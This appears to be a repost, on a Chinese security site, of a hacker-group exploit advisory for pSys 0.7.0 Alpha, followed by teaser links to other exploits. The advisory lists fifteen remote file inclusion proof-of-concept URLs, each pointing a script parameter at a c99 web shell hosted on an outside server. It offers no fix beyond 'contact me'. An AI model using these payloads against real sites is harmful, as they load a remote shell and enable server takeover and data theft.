pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

所属分类: 网络安全 / Exploit 阅读数: 187
收藏 0 赞 0 分享
====================================================
| pSys v0.7.0 Alpha Multiple Remote File Include
| (works only with register_globals = on)
| Founded By rXh RoMaNTiC-TeaM
====================================================

[!] Discovered.: RoMaNcYxHaCkEr
[!] Vendor.....: http://www.powie.de
[!] My Homepage...: WwW.4RxH.CoM
[!] RoMaNTiC-TeaM Members ...: Unknown Hacker , aLwHeD , GaMe-OvEr-HaCkErs
[!] Contact Me ...: rxh0@hotmail.com

[!] Background.: pSys is a module based PHP Script

[!] Bugs........: In Different Files & In Different Variable And Lines

[!] PoC........:

http://4RxH.CoM/cms1/login.inc.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/adminmenuright.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/fuss.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/kopf.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/forum/ajax_newpost.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_shopkategorie.php?pdir_mod=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_shopkunde.php?pdir_mod=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_user.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/mod/gb/ajax_post.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/csg/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/csg/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/default/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/default/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/simpleblack/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/simpleblack/kopf.php?pdir=http://www.uploadhere.org/c99.txt?

[!] Solution...: Contact With Me I Will Declear All This Fucking Function

[!] Greetingz..: No One Deserved (Am I Said The Truth ?!!!)

[!] Thx .. : DNX For Your Exploit I Found This Bugs From Your Exploit :)

[!] rXh

[!] bEST wISHES
更多精彩内容其他人还在看

Maian Search

-[*] ================================================================================ [*]- -[*] Maian Search <= v1.1 Insecur
收藏 0 赞 0 分享

Maian Weblog

-[*] ================================================================================ [*]- -[*] Maian Weblog <= v4.0 Insecu
收藏 0 赞 0 分享

Maian Guestbook

-[*] ================================================================================ [*]- -[*] Maian Guestbook <= 3.2 Insec
收藏 0 赞 0 分享

Maian Recipe

-[*] ================================================================================ [*]- -[*] Maian Recipe <= v1.2 Insecu
收藏 0 赞 0 分享

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

<?php ## ## Name: Fuzzylime 3.01 Remote Code Execution Exploit ## Credits: Charles "real" F. <charlesfol[a
收藏 0 赞 0 分享

jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

--== ================================================================================ ==-- --== jSite 1.0 OE Multiple Remot
收藏 0 赞 0 分享

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

==================================================================== Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
收藏 0 赞 0 分享

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

############################################################### #################### Viva IslaM Viva IslaM #################### ##
收藏 0 赞 0 分享

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

#!/usr/bin/perl #!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!! #after i noticed that there was a prob
收藏 0 赞 0 分享

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

#!/usr/bin/php <?php ## ## Fuzzylime 3.01 Remote Code Execution ## Credits: Inphex and real ## ## [C:]# php fuzzylime.p
收藏 0 赞 0 分享
查看更多